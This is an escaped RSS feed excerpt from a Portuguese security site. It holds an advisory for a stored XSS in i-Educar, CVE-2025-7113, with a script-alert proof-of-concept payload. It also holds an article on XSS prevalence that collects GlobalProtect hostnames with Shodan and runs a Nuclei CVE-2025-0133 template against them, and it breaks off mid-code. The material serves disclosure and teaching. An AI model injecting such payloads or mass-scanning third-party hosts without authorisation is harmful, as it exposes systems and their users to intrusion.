&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_componente_curricular_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/module/ComponenteCurricular/edit?id=ID&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7113-cross-site-scripting-xss-armazenado-no-endpoint-educar_componente_curricular_lstphp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-7113: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_componente_curricular_lst.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7113&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7113&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_componente_curricular_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/module/ComponenteCurricular/edit?id=ID&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Nome&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar Pacxxx&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7113/image.png&amp;#34;
	width=&amp;#34;1831&amp;#34;
	height=&amp;#34;724&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7113/image_hu_d711a16372c343c4.png 480w, /p/cve-2025-7113/image_hu_607a4f81b3b0b224.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;252&amp;#34;
		data-flex-basis=&amp;#34;606px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7113/image-1.png&amp;#34;
	width=&amp;#34;1805&amp;#34;
	height=&amp;#34;900&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7113/image-1_hu_3f76544bd7d912b4.png 480w, /p/cve-2025-7113/image-1_hu_3c6daeb8a8f8d93b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;200&amp;#34;
		data-flex-basis=&amp;#34;481px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7113/image-2.png&amp;#34;
	width=&amp;#34;1846&amp;#34;
	height=&amp;#34;872&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7113/image-2_hu_37cd16a8824fe8f6.png 480w, /p/cve-2025-7113/image-2_hu_c5787eb0386ae1dc.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;211&amp;#34;
		data-flex-basis=&amp;#34;508px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/Dd4RdfomMms&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/Dd4RdfomMms&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7113.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7113.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>XSS Não Está Morto - Hacktiba Pulse 07</title>
        <link>https://www.cvehunters.com/pt/articles/xss-nao-esta-morto/</link>
        <guid>https://www.cvehunters.com/pt/articles/xss-nao-esta-morto/</guid>
        <description>&amp;lt;h2 id=&amp;#34;introdução-xss-ainda&amp;#34;&amp;gt;Introdução: “XSS? Ainda?”
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Em pleno 2025, ainda estamos falando de XSS? Sim, ainda estamos. Mesmo com o uso de frameworks modernos, WAFs inteligentes e uma infinidade de artigos explicando como mitigar essa ameaça, o Cross-Site Scripting (XSS) continua presente, sorrateiro, persistente e muitas vezes negligenciado.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O XSS é uma das primeiras vulnerabilidades abordadas em cursos introdutórios de segurança ofensiva e testes de invasão em aplicações web. Com um payload simples, instrutores demonstram como essa falha é trivial de ser explorada, evidenciando o perigo e a facilidade de sua exploração.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;introdução-xss-ainda&amp;#34;&amp;gt;Introdução: “XSS? Ainda?”
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Em pleno 2025, ainda estamos falando de XSS? Sim, ainda estamos. Mesmo com o uso de frameworks modernos, WAFs inteligentes e uma infinidade de artigos explicando como mitigar essa ameaça, o Cross-Site Scripting (XSS) continua presente, sorrateiro, persistente e muitas vezes negligenciado.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O XSS é uma das primeiras vulnerabilidades abordadas em cursos introdutórios de segurança ofensiva e testes de invasão em aplicações web. Com um payload simples, instrutores demonstram como essa falha é trivial de ser explorada, evidenciando o perigo e a facilidade de sua exploração.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Mas o que é XSS, afinal? De acordo com a &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://owasp.org/www-community/attacks/xss/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;OWASP&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, ataques de Cross-Site Scripting são um tipo de injeção na qual scripts maliciosos são inseridos em sites vulneráveis. Esses ataques ocorrem quando um invasor usa uma aplicação web para enviar código malicioso, geralmente scripts executados no navegador, para outro usuário. As falhas que tornam esses ataques possíveis são bastante comuns e surgem sempre que uma aplicação web incorpora a entrada do usuário na saída gerada sem realizar a validação ou codificação apropriadas.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Também de acordo com a &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://owasp.org/www-community/attacks/xss/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;OWASP&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, o navegador da vítima não possui mecanismo para distinguir scripts legítimos de maliciosos. Assim, ao receber e executar o código, ele confia que ele veio de uma fonte segura. Como resultado, o invasor pode acessar cookies, tokens de sessão e outras informações confidenciais armazenadas pelo navegador, bem como reescrever o conteúdo da página ou redirecionar o usuário para sites maliciosos disfarçados de legítimos.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image.png&amp;#34;
	width=&amp;#34;462&amp;#34;
	height=&amp;#34;160&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image_hu_e521a21402f0fae0.png 480w, /articles/xss-nao-esta-morto/image_hu_452c6b4617d6a6e9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Exemplo simples de payload de XSS para executar mensagem.&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;288&amp;#34;
		data-flex-basis=&amp;#34;693px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;cve-hunters-vs-xss&amp;#34;&amp;gt;CVE-Hunters vs XSS
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O grupo &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; foi criado em novembro de 2024 como uma iniciativa conjunta entre alunos e um professor, com um objetivo claro: identificar vulnerabilidades (CVEs) em projetos de código aberto. A proposta era proporcionar aos alunos experiência prática na busca por falhas em ambientes reais, indo além de laboratórios controlados ou desafios de Capture The Flag (CTF).&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Desde então, o grupo analisou uma ampla gama de projetos, desde pequenos sistemas comunitários até aplicações amplamente utilizadas nos setores público e educacional. Ao longo do caminho, um padrão se destacou: a frequência com que vulnerabilidades de &amp;lt;b&amp;gt;Cross-Site Scripting (XSS)&amp;lt;/b&amp;gt; foram encontradas.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Essa recorrência levanta uma questão importante: os desenvolvedores pararam de tratar o XSS com a devida seriedade? Apesar de ser uma falha amplamente documentada e conhecida há anos, ela ainda aparece com frequência. Mesmo em organizações com processos de desenvolvimento maduros, vulnerabilidades de XSS continuam a aparecer devido à complexidade dos fluxos de entrada e saída, ao uso de bibliotecas legadas ou à falta de testes contextualizados.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Atualmente, o grupo tem &amp;lt;b&amp;gt;135 vulnerabilidades reportadas&amp;lt;/b&amp;gt;, &amp;lt;b&amp;gt;53 das quais já foram oficialmente registradas como CVEs&amp;lt;/b&amp;gt;. Do total de vulnerabilidades descobertas, &amp;lt;b&amp;gt;104 são do tipo XSS&amp;lt;/b&amp;gt;, o que representa uma proporção significativa e preocupante.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/1.png&amp;#34;
	width=&amp;#34;1024&amp;#34;
	height=&amp;#34;768&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/1_hu_9cbac253be823803.png 480w, /articles/xss-nao-esta-morto/1_hu_e09f18163500396d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Tipos de Vulnerabilidades encontradas pelo CVE-Hunters&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;133&amp;#34;
		data-flex-basis=&amp;#34;320px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Foram identificadas 62 ocorrências do tipo armazenado e 42 do tipo refletido, revelando uma distribuição relativamente equilibrada.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/2.png&amp;#34;
	width=&amp;#34;1024&amp;#34;
	height=&amp;#34;768&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/2_hu_9d85e2af39ca47f0.png 480w, /articles/xss-nao-esta-morto/2_hu_b7c8b0a71c9c5136.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Quantidade de XSS Armazenado vs Refletido&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;133&amp;#34;
		data-flex-basis=&amp;#34;320px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Essas estatísticas por si só reforçam a ideia de que o XSS ainda é um problema real, frequentemente ignorado durante o desenvolvimento, e que continua a merecer atenção, tanto da comunidade técnica quanto dos desenvolvedores responsáveis ​​por aplicativos em produção.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;experiência-prática&amp;#34;&amp;gt;Experiência prática
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Você pode estar pensando: &amp;#34;Ok, o grupo &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; encontrou muitos XSS em projetos de código aberto, mas quem pode dizer que grandes empresas também são vulneráveis?&amp;#34;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vamos fazer um experimento rápido com um dos XSS mais recentes divulgados durante a escrita deste artigo: &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://security.paloaltonetworks.com/CVE-2025-0133&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-2025-0133&amp;lt;/a&amp;gt;.&amp;lt;/b&amp;gt; Um XSS refletido nos produtos de gateway e portal GlobalProtect, recursos do PAN-OS da Palo Alto Networks, publicado em 14 de maio de 2025.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Com uma simples consulta no Shodan, podemos verificar a estimativa de uso deste produto no mundo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-1.png&amp;#34;
	width=&amp;#34;2502&amp;#34;
	height=&amp;#34;572&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-1_hu_e49695ca67986346.png 480w, /articles/xss-nao-esta-morto/image-1_hu_9a3164d2b1826f8.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Busca por páginas com Global Protect no Shodan &amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;437&amp;#34;
		data-flex-basis=&amp;#34;1049px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;No entanto isso não significa que todos estão vulneráveis. Vamos ao experimento para este artigo.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Primeiro, extraímos alguns resultados do Shodan, uma pequena amostragem do montante total:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-bash&amp;#34; data-lang=&amp;#34;bash&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;shodan search --fields hostnames &amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;http.title:&amp;amp;#34;GlobalProtect Portal&amp;amp;#34; port:443&amp;amp;#39;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;|&amp;lt;/span&amp;gt; grep -v &amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;^$&amp;amp;#39;&amp;lt;/span&amp;gt; &amp;amp;gt; globalprotect-hostnames.txt
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-2.png&amp;#34;
	width=&amp;#34;1715&amp;#34;
	height=&amp;#34;877&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-2_hu_f5d23ac8a0a8c2d7.png 480w, /articles/xss-nao-esta-morto/image-2_hu_80e917587581191.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Shodan CLI usado para exportar páginas com Global Protect&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;195&amp;#34;
		data-flex-basis=&amp;#34;469px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Depois disso, podemos usar o &amp;lt;b&amp;gt;&amp;lt;code&amp;gt;Nuclei&amp;lt;/code&amp;gt;&amp;lt;/b&amp;gt; para testar essa vulnerabilidade e automatizar o teste:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-bash&amp;#34; data-lang=&amp;#34;bash&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;nuclei -l globalprotect-hostnames.txt -t CVE-2025-0133.yaml
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-3.png&amp;#34;
	width=&amp;#34;1629&amp;#34;
	height=&amp;#34;867&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-3_hu_a4ac1f5eae1ec9f0.png 480w, /articles/xss-nao-esta-morto/image-3_hu_a7cb5b9475b5bb68.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Resultado Nuclei template CVE-2025-0133&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;450px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Template do nuclei utilizado para realizar o scan: &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0133.yaml&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-2025-0133&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
